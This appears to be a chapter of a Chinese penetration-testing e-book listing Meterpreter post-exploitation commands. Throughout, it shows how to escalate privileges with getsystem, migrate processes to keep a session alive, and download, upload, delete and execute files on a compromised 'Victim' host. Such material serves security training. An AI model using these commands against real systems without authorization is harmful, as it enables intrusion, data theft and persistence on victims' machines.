1.1. 关于meterpreter的命令解释

当我们通过漏洞或者社会工程学获取到一个meterpreter的会话之后,我们可以做什么?

如果我们不知道meterpreter会话可以用来执行什么操作,那我们即使获取到meterpreter会话也没有什么用处

所以我们需要讲解一下关于meterpreter的命令,来帮助大家更好地运用

这一节我们着重讲解meterpreter会话可以用来做什么

关于如何获取meterpreter,欢迎阅读本电子书其他节,里面有很详细的讲解,比如永恒之蓝还有一些工具的使用,都可以获取到meterpreter会话

  • backgroup

backgroup命令用来隐藏当前的会话,那为什么需要隐藏当前的会话呢?原因可能有两个
一个是你想使用另一个msf的模块,该模块中设置的参数有session选项
另一个是可能获取到了很多会话,你想切换会话,需要首先隐藏会话,再切换会话

  • session -i id

session命令用来说明你想进入哪一个会话 可以使用命令

session -i **id**
  • ps

ps命令用来查看Victim主机上正在运行的进程服务

  • getuid

getuid命令用来查看该进程的Username

  • getpid

getpid命令用来查看该进程服务的id

  • migrate
    migrate pid
    
    migrate命令用来切换metrepreter会话依赖的进程服务,该命令可以有效防止因为Victim用户关闭进程而导致meterpreter会话失效 getuid getpid
  • getsystem

getsystem命令用来提权,获取管理员等级的权限 getuid

  • pwd

pwd命令用来显示当前的工作目录,就是显示你当现处于的位置,比如Victim在桌面上开启了进程,使你获得meterpreter会话,那当前的工作目录就应该是桌面

  • cd
    cd 'C:\'
    
    cd命令用来切换工作目录,该命令的意思就是切换到C盘的根目录下,此处需要注意\是反斜杠 pwd
  • cat
    cat demo.txt
    
    cat命令用来查看文件内容,该命令的意思就是查看demo这个文本文件的内容
  • edit
    edit demo.txt
    
    edit命令用来编辑文件内容,该命令的意思就是编辑demo这个文本文件的内容
  • download
    download C:\\demo.txt /root/
    
    download命令用来将Victim主机中的文件下载到本地,命令格式为 download 需要下载的内容 下载到本地的路径
  • rm
    rm demo.txt
    
    rm命令用来删除文件,和del一样,该命令的意思就是删除demo这个文本文件
  • upload
    upload /root/demo.txt C:\\
    
    upload命令用来将本地的文件上传到Victim主机上,命令格式为upload 需要上传的内容 上传到Victim主机上的路径
  • execute
    execute -f ip.exe
    
    execute命令用来执行Victim主机上的可执行文件(.exe),该命令的意思就是执行ip.exe这个软件
  • kill
    kill pid
    
    kill命令用来关闭进程
  • search
    search -f *demo*
    
    search命令用来在Victim主机上查找某些特定的文件,该命令的意思是,查找所有文件名包含demo的文件
powered by GitbookFile Modify: 2019-05-12 10:24:56

results matching ""

    No results matching ""